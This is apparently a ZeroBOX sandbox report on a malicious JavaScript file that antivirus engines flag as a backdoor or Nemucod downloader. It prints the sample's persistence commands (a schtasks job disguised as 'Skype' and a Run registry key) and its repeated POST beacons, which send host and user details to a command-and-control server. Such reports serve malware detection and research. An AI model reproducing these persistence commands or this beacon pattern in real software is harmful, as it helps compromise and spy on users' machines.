popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Order_inquiry_021_014_21.js

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 15, 2021, 12:17 p.m. Sept. 15, 2021, 12:20 p.m.
Size 16.0KB
Type ASCII text, with very long lines, with no line terminators
MD5 836365de25b8b33c14a7971eeca6151b
SHA256 a51cc3c60ccd7b5ea425e70d4a6d3b66174f6e0b71304e9cc34bd800e54d6bc4
CRC32 39FD302A
ssdeep 384:wLvHm13dN8b4H28naIpRkIfyqcmNxey3hzi8zzHLRsdqjyNLxFcXtqFZaZ:wi1tNXT7PWchmYxsdqjyNNFc0FZaZ
Yara None matched

Name Response Post-Analysis Lookup
grace2020.home-webserver.de
A 31.210.20.230
31.210.20.230
IP Address Status Action
164.124.101.2 Active Moloch
31.210.20.230 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Skype" has successfully been created.
console_handle: 0x00000007
1 1 0
cmdline Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: Schtasks
parameters: /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
filepath: Schtasks
1 1 0
cmdline Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\P7EKOWB6GH reg_value "C:\ProgramData\Order_inquiry_021_014_21.js"
cmdline Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
Arcabit JS.Heur.Backdoor.2.118C878E.Gen
BitDefender JS.Heur.Backdoor.2.118C878E.Gen
MicroWorld-eScan JS.Heur.Backdoor.2.118C878E.Gen
Ad-Aware JS.Heur.Backdoor.2.118C878E.Gen
Emsisoft JS.Heur.Backdoor.2.118C878E.Gen (B)
FireEye JS.Heur.Backdoor.2.118C878E.Gen
Ikarus Win32.Outbreak
Microsoft TrojanDownloader:Win32/Nemucod!ml
GData JS.Heur.Backdoor.2.118C878E.Gen
ALYac JS.Heur.Backdoor.2.118C878E.Gen
MAX malware (ai score=84)
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

send

 buffer: POST /Vre HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1152
sent: 304
1 304 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

send

 buffer: POST /Vre HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1252
sent: 304
1 304 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: POST /Vre HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1252
sent: 304
1 304 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

send

 buffer: POST /Vre HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1280
sent: 304
1 304 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

send

 buffer: POST /Vre HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1152
sent: 304
1 304 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

send

 buffer: POST /Vre HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1276
sent: 304
1 304 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

InternetCrackUrlW

 url: http://grace2020.home-webserver.de:3774/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0

send

 buffer: POST /Vre HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: grace2020.home-webserver.de:3774 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1280
sent: 304
1 304 0

send

 buffer: !
socket: 1064
sent: 1
1 1 0
parent_process wscript.exe martian_process Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
parent_process wscript.exe martian_process "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
file C:\Windows\System32\schtasks.exe